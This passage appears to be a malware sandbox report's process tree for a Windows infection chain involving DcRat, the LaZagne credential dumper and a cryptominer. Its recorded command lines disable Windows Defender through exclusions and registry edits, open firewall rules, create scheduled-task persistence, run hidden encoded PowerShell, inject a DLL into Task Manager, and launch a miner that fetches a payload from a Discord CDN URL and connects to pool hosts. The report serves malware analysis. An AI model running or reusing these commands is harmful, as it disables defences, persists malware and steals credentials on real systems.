- Executes dropped EXE
PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"3⤵
- Executes dropped EXE
PID:5000
-
-
C:\Users\Admin\AppData\Local\Temp\Files\0j4.exe"C:\Users\Admin\AppData\Local\Temp\Files\0j4.exe"3⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\Files\0j4.exeC:\Users\Admin\AppData\Local\Temp\Files\0j4.exe4⤵
- Executes dropped EXE
PID:4304
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"3⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1476 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:4012 -
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /im chrome.exe /f5⤵
- Kills process with taskkill
PID:4524
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:1056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"C:\Users\Admin\AppData\Local\Temp\Files\f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3508
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe" -Force4⤵PID:5108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:2380 -
C:\Users\Admin\Pictures\aTRkSzKI5BC7TPjmCAGIPWNw.exe"C:\Users\Admin\Pictures\aTRkSzKI5BC7TPjmCAGIPWNw.exe"5⤵
- Executes dropped EXE
PID:3880
-
-
C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"5⤵PID:3476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5016
-
-
C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"C:\Users\Admin\Pictures\AhjRPOGDGfLEDTGgehsebysf.exe"6⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5772
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1432
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4008
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1508
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:8
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:384
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5492
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:220
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:4584
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:5336
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:5320
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:5892
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:808⤵PID:2480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Modifies data under HKEY_USERS
PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\3893dd77f0ce80920420c4e5d9e1888e.exeC:\Users\Admin\AppData\Local\Temp\csrss\3893dd77f0ce80920420c4e5d9e1888e.exe8⤵PID:3180
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe8⤵PID:3608
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:5688
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- DcRat
- Creates scheduled task(s)
PID:60
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:5852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵PID:2896
-
-
-
-
-
C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"5⤵
- Executes dropped EXE
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2596
-
-
C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"C:\Users\Admin\Pictures\JYQvDsNLyD1BiHmpCiD5dmqQ.exe"6⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3648
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5840
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:5492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:540
-
-
-
-
C:\Users\Admin\Pictures\H8Vxc3qhrAdW6f9d48nBRkdV.exe"C:\Users\Admin\Pictures\H8Vxc3qhrAdW6f9d48nBRkdV.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe6⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "7⤵PID:5108
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:5852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F8⤵
- DcRat
- Creates scheduled task(s)
PID:5360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsg3880.tmpC:\Users\Admin\AppData\Local\Temp\nsg3880.tmp6⤵PID:2776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 11047⤵
- Program crash
PID:5464
-
-
-
-
C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe"C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==5⤵
- Executes dropped EXE
PID:872 -
C:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exeC:\Users\Admin\Pictures\pM1YjaTge9xq11lwGXHw5wei.exe PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA== failrestart6⤵PID:4204
-
-
-
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --silent --allusers=05⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Enumerates connected drives
- Maps connected drives based on registry
- Modifies system certificate store
PID:1292 -
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exeC:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x69ee9530,0x69ee953c,0x69ee95486⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:736
-
-
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe"C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1292 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116154911" --session-guid=56fd4209-d392-4095-9ad0-39a348e34dfc --server-tracking-blob=NmFkMWQ5NDEwNDIxYzcxOTBlZWFkZjFiZTM1YTkwMDU2OWNjZWE0OTYwMWM2YWFhMTRiYzZiOWE1NjJkMGYwMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMDE0NC4wMDk0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZTMyNzMxNy03YzFjLTRiNGYtYjg5My0wOTY2ZTg0MjUyOTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=68050000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5576 -
C:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exeC:\Users\Admin\Pictures\qhD0Fjd2sS2bPUQL1AQPs2sm.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x692b9530,0x692b953c,0x692b95487⤵
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"6⤵PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x502614,0x502620,0x50262c7⤵
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:5356
-
-
-
-
C:\Users\Admin\Pictures\whHieXPyyb8wmmyMSG6CBi5j.exe"C:\Users\Admin\Pictures\whHieXPyyb8wmmyMSG6CBi5j.exe"5⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\7zS480E.tmp\Install.exe.\Install.exe6⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD7.tmp\Install.exe.\Install.exe /klhTMdidYdHl "385118" /S7⤵
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5380 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵PID:5996
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵PID:5304
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵PID:5352
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵PID:5368
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵PID:6016
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵PID:5300
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵PID:6072
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵PID:5408
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqBxNDcCI" /SC once /ST 00:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Blocklisted process makes network request
- Executes dropped EXE
- Checks processor information in registry
- Creates scheduled task(s)
PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqBxNDcCI"8⤵PID:888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqBxNDcCI"8⤵PID:5820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 15:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exe\" Ik /AZsite_idLOu 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4376
-
-
-
-
-
C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe"C:\Users\Admin\Pictures\cxcfHffNmhPEQy61bLBMgSz0.exe"5⤵
- Loads dropped DLL
- Registers COM server for autorun
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:6032
-
-
C:\Users\Admin\Pictures\iCWH3B9J8lpTZ8jeQ23ry2W7.exe"C:\Users\Admin\Pictures\iCWH3B9J8lpTZ8jeQ23ry2W7.exe"5⤵PID:5216
-
-
C:\Users\Admin\Pictures\gQMKFKOnGqgf3wRskOTOOpYZ.exe"C:\Users\Admin\Pictures\gQMKFKOnGqgf3wRskOTOOpYZ.exe"5⤵PID:4744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 2846⤵
- Program crash
PID:5132
-
-
-
C:\Users\Admin\Pictures\w80gJBsJ5XsqWMYTh0o5CW3t.exe"C:\Users\Admin\Pictures\w80gJBsJ5XsqWMYTh0o5CW3t.exe"5⤵PID:4948
-
-
C:\Users\Admin\Pictures\ouzvpVKT6CtdrRiK38JNhRY8.exe"C:\Users\Admin\Pictures\ouzvpVKT6CtdrRiK38JNhRY8.exe"5⤵PID:1836
-
-
C:\Users\Admin\Pictures\le4XVNTwlsCFT1vSYV9qZfgQ.exe"C:\Users\Admin\Pictures\le4XVNTwlsCFT1vSYV9qZfgQ.exe"5⤵PID:2104
-
-
C:\Users\Admin\Pictures\iv6t0TaUQ3P23n2ZZ4xgHtqt.exe"C:\Users\Admin\Pictures\iv6t0TaUQ3P23n2ZZ4xgHtqt.exe"5⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 2286⤵
- Program crash
PID:4196
-
-
-
C:\Users\Admin\Pictures\5OOy4aNueB5QpC3S0HgRtZvH.exe"C:\Users\Admin\Pictures\5OOy4aNueB5QpC3S0HgRtZvH.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:6020
-
-
C:\Users\Admin\Pictures\uLBknOhgdGBcPr4C2VIutNtS.exe"C:\Users\Admin\Pictures\uLBknOhgdGBcPr4C2VIutNtS.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4128
-
-
C:\Users\Admin\Pictures\nC3QXV6hbtSKDWLelvGt5PmU.exe"C:\Users\Admin\Pictures\nC3QXV6hbtSKDWLelvGt5PmU.exe"5⤵PID:2188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 7606⤵
- Program crash
PID:956
-
-
-
C:\Users\Admin\Pictures\ls0uPFdYZj1I88hK7WfRz2aW.exe"C:\Users\Admin\Pictures\ls0uPFdYZj1I88hK7WfRz2aW.exe" --silent --allusers=05⤵
- Loads dropped DLL
PID:3120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 5046⤵
- Program crash
PID:5392
-
-
-
C:\Users\Admin\Pictures\4mcbZTtdFuPL79KiADBDoIeo.exe"C:\Users\Admin\Pictures\4mcbZTtdFuPL79KiADBDoIeo.exe"5⤵PID:5532
-
-
C:\Users\Admin\Pictures\KvvRqBbNqfutOD0HhIV3A0C4.exe"C:\Users\Admin\Pictures\KvvRqBbNqfutOD0HhIV3A0C4.exe"5⤵PID:2596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 2926⤵
- Program crash
PID:5364
-
-
-
C:\Users\Admin\Pictures\DpJ873NtgAlrFVbXX7h6FnM9.exe"C:\Users\Admin\Pictures\DpJ873NtgAlrFVbXX7h6FnM9.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:1072
-
-
C:\Users\Admin\Pictures\7jJH3p4AmVKOrGbnbQaWPW9f.exe"C:\Users\Admin\Pictures\7jJH3p4AmVKOrGbnbQaWPW9f.exe"5⤵PID:4632
-
-
C:\Users\Admin\Pictures\qI7aPgVljoENRNVrUTEUh6Bq.exe"C:\Users\Admin\Pictures\qI7aPgVljoENRNVrUTEUh6Bq.exe"5⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4448
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12523⤵
- Program crash
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
